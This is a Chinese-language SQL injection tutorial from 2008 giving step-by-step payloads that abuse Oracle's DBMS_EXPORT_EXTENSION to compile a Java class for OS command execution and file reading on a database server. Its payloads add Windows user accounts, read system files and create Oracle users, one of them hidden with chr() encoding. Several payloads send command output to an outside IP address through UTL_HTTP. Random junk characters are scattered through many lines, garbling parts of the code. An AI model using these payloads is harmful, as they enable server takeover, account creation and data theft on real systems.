以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
6 f; F; L( K& K Q! f/ p1 C+ |select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') z W5 m8 M9 X4 w4 c# X
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
) `% R8 k1 Y2 unew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
7 J4 w" }2 e4 ^/ E5 {; P/ O7 ^$ b}'''';END;'';END;--','SYS',0,'1',0) from dual 0 |$ l! J! }# M. q5 P
) 2 `, ^4 [3 k" `% j: [
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
! M, V& P! U% Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
( K9 X' j9 s* E7 hcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
3 ?) B4 B# N8 a- vnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
! J' I/ x2 [; ^3 M3 J}'''';END;'';END;--','SYS',0,'1',0) from dual
B0 o; _: q7 N; G* X& z* w) 7 P: ?$ u5 N" Q a& `
同时把后面步骤提到的对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
1 s$ S* _9 T! C0 K( lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual6 W+ _6 F& p# J. P# L
3.创建函数
( ]- I; R' K5 P- Y, j9 H5 u$ W- eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" y5 e$ ]6 H( {: J# W
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual/ X8 \, W: R5 S
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" M9 i0 [) Z+ k' l- B4 t
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
# ~& c+ l, j) E3 I1 vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual. X/ `; h8 H. I2 o0 N* h! N
5.测试上面的几步是否成功
/ G; d/ R" O, X' [! L# Wand '1'<>'11'||(
0 P7 c6 W5 i( i& }- N! ?select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' . } u$ O4 w4 S8 X$ k9 ~4 D
) " u! h3 g0 g: m* F
and '1'<>(
) Y: p8 v( H m- xselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' 0 t y# n3 ]: a/ O1 e* {
) , O; R5 C- g/ [) I0 [
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
" O7 i- q/ g, cselect sys.LinxRunCMD('cmd /c net user linx /add') from dual
3 y7 p5 Z' y, R$ |5 @3 X. ]$ m- w. C6 J
) 2 O9 q# z% H# G! ?0 Q+ J
/xxx.jsp?id=1 and '1'<>(
6 V0 ?+ B! w( gselect sys.LinxReadFile('c:/boot.ini') from dual
' \2 R! `* I5 V( I w5 q! O, s+ M: \/ z: `
)
7 {3 p; N( L$ ~; G 4 b* h# l+ H5 ]
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>(
/ \$ T1 O2 \1 Z& E/ B! L9 dSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual2 u3 f$ e7 w# @- U9 Y$ a5 K h
)
7 q# K2 P8 ~1 W% I+ j/xxx.jsp?id=1 and '1'<>(
7 e/ {) ]/ g9 L# S; \! ?% G& V* LSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
- D1 D) X6 b+ [0 f% y4 Z! ]4 Y) " s2 f$ Q O9 }% q
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
; q2 c: ]/ X/ u) h% L+ x- y) n" Mselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" W. [& [ k/ odrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual ) a( m+ @( M2 S
====================================================
" i) {1 r" R5 O: M V/ P# T1 z2 O全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
0 B, e5 y* L: Q2 c( [! c* I4 Eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" `, Q# ^, E' T$ `4 g* `
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual! u! j* S. i/ r5 G' D" S3 H
即:
$ T" O) z7 n7 T9 B- B2 [7 pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),$ \* Z" i9 u4 ^1 K5 c" J# i! k
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual . ]7 l5 d Y$ c( M6 H1 S, [# O
确定漏洞存在:
1<>( & v' b& @7 q; f' d5 N3 U- t
select user_id from all_users where username='LINXSQL' : x* ]+ g; R4 f% o3 D* V8 M
)
给linxsql连接权限:
' S& B. O5 M0 |1 f' |+ x: \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 |6 S$ y, Z: ~3 ]% i# O1 T
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual , y. R q% V6 y9 }$ c
删除帐号:
4 n! K$ ~# ]9 w9 J3 Oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ C/ w+ L' C \ I U' [. O( {2 _drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
1.jsp?id=1 and '1'<>( 4 v. l5 Z5 X8 P1 ]& F v/ M( ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# R+ E5 o1 n8 Y2 j" c* }create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual5 H) B7 v) v( q" G2 L
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE0 V0 F/ L$ J" G- E) M
)
; q, t% G2 o( J' O2 D1 E" Y& e" [0 F& }( [
+ a/ ]* u. v8 y% f( d s: {: V5 P! G$ M$ i% ?
|